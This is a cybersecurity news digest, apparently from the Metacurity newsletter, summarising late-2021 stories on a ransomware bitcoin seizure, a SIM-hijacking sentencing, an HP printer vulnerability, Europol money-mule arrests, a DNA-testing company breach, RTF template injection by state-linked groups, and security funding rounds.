FBI Seizes $2.3 Million in Bitcoin From REvil and GandCrab Affiliate
SIM hijacking defendant sentenced to ten months, HP issues security updates, 1,803 money mules busted, DNA testing company hacked, Tens of thousands Iranians targeted in theft scheme, more
It’s the giving season. Consider giving a colleague or friend a premium subscription to Metacurity.
In an unsealed complaint, the FBI said it seized 39.89138522 bitcoins worth approximately $2.3 million at current prices ($1.5 million at time of seizure) from the Exodus wallet of a well-known REvil and GandCrab ransomware affiliate on August 3rd, 2021.
The complaint states that the wallet contained REvil ransom payments belonging to an affiliate identified as "Aleksandr Sikerin, a/k/a Alexander Sikerin, a/k/a Oleksandr Sikerin" with an email address of 'firstname.lastname@example.org.' (Lawrence Abrams / Bleeping Computer)
A recently discovered FBI training document obtained by U.S. nonprofit group Property of the People shows that U.S. law enforcement can gain limited access to the content of encrypted messages from secure messaging services such as iMessage, Line, and WhatsApp, but not to messages sent via Signal, Telegram, Threema, Viber, WeChat, or Wickr.
The document doesn’t contain any new information but does provide an up-to-date summary of what type of information the FBI can currently obtain from each of the listed services. (Catalin Cimpanu / The Record)
PropertyOfThePeople @PropOTPWe got an FBI training doc on obtaining data from secure messaging apps, and shared it w/ @AndyKroll/@RollingStone. #FOIA https://t.co/FcjEUV1sN3
Garrett Endicott, the sixth and final defendant in a gang called “The Community,” accused of perpetrating a multimillion-dollar SIM hijacking case, was sentenced to 10 months in prison and ordered to pay more than $121,000 in restitution.
The Community engaged in a string of SIM hijacking incidents targeting individual users’ cryptocurrency exchange accounts in seven states. Endicott was indicted in 2019 along with five others, four of whom were sentenced to two to four years in prison and one who was given probation. (A.J. Vicens / Cyberscoop)
Twitter said that although the sharing of private media can impact anyone, it "can have a disproportionate effect on women, activists, dissidents, and members of minority communities." If someone reports a photo or video that violates the policy, Twitter will remove the media and take action based on its enforcement options. (Kris Holt / Engadget)
Related: Teller Report, Quartz, Protocol, Twitter, Gadgets Now, The Hacker News, Asia One Digital, ZDNet, TheDigitalHacker, TechWorm, Candid.Technology, MediaNama, The South African, Gadgets Now, Techradar, Silicon Republic, Pocket-lint, The Mac Observer
Hewlett Packard released security updates earlier this month to address a vulnerability that impacts more than 150 models from the company’s line of multi-functional printers.
The vulnerability (CVE-2021-39238) can be used to create wormable exploits that can self-replicate and spread to other H.P. printers inside internal networks or over the internet. (Catalin Cimpanu / The Record)
In a rare speech, Britain’s foreign intelligence chief Richard Moore warned about the spread of Chinese surveillance technology, which he said is used in “targeting the Uyghur population in Xinjiang.” He also said the U.K. needed to recognize that “technologies of control are being increasingly exported to other governments.”
One point raised by Moore in an earlier BBC interview is China’s use of “data traps,” which is “If you allow another country to gain access to really critical data about your society, over time that will erode your sovereignty, you no longer have control over that data.” (Dan Sabbagh / The Guardian)
Europol announced the arrest of 1,803 money mules out of 18,351 identified following an international money-laundering crackdown operation codenamed EMMA (European Money Mule Action) 7.
The operation relied on a large-scale collaboration of law enforcement agencies in 27 countries between September 15 and November 30, 2021. (Bill Toulas / Bleeping Computer)
An Ohio-based DNA testing company, DNA Diagnostics Center (DDC), disclosed a hacking incident that affected 2,102,436 persons.
The incident occurred between May 24, 2021, and July 28, 2021, and the firm concluded its internal investigation on October 29, 2021. The data accessed during the incident are full names, credit and debit card numbers plus CVVs, financial account numbers, and platform account passwords. (Bill Toulas / Bleeping Computer)
Researchers at Check Point discovered evidence that tens of thousands of Iranians had been targeted in a financial theft scheme involving hackers sending texts to Android users that impersonated branches of the Iranian government.
The average victim lost between $1,000 and $2,000, and the Check Point researchers found that the stolen data was easily accessible online to third parties. (Maggie Miller / The Hill)
Related: Check Point
Researchers at Proofpoint say that advanced persistent threat (ATP) groups from China, Russia, and India have adopted this year a new attack technique called “RTF Template Injection,” which has made their attacks harder to detect and stop.
The technique involves a Microsoft Office feature where users can create a document using a pre-defined template. These templates can be stored locally or downloaded from a remote server for attacks known as “remote template injections.” Proofpoint says the threat actors are putting together RTF files with lures that may interest their targets. They then craft a template that contains malicious code that runs malware and edit the RTF files to load the template when the file is opened. (Catalin Cimpanu / The Record)
As several organizations stress, the use of the term“blacklist,” common in cybersecurity, carries a tone of racial exclusivity, equating “black” with bad.
Many experts suggest the time has come to replace the term “blacklist” with the more neutral “denylist.” (Lorenzo Franceschi-Bicchierai / Motherboard)
According to Finnish press reports, a Finnish court ruled that chat messages secretly gathered by the FBI from encrypted phone company Anom can’t be used as evidence against two particular suspects.
Anom was an encrypted phone company whose convicted drug-trafficker owner provided devices to the FBI in 2018. The FBI and the Australian police surreptitiously surveilled messages sent over the devices. (Joseph Cox / Motherboard)
AI-driven hardware security company has announced the closing of an oversubscribed Series B funding at $25 million.
Dennis Anthony H. Uy and Series A investor Orbit Venture Partners led the round, supplemented by a group of individual investors, including Dave Welch, Founder of Infinera, and Dick Kramlich, Chairman Emeritus of New Enterprise Associates (NEA) and General Partner of Green Bay Ventures. (Security Week)
Related: Business Wire
Automated privacy risk detection company Soveren has raised $6.5 million in a Seed funding round.
first minute capital led the round and was joined by Northzone, 11 unicorn founders, and a group of global CEOs. The founders of Airbnb, Datadog, MuleSoft, Snyk, and Color invested alongside Sir Richard Branson’s family, the Chairman CEO of Palo Alto Networks, and others. (Carly Page / TechCrunch)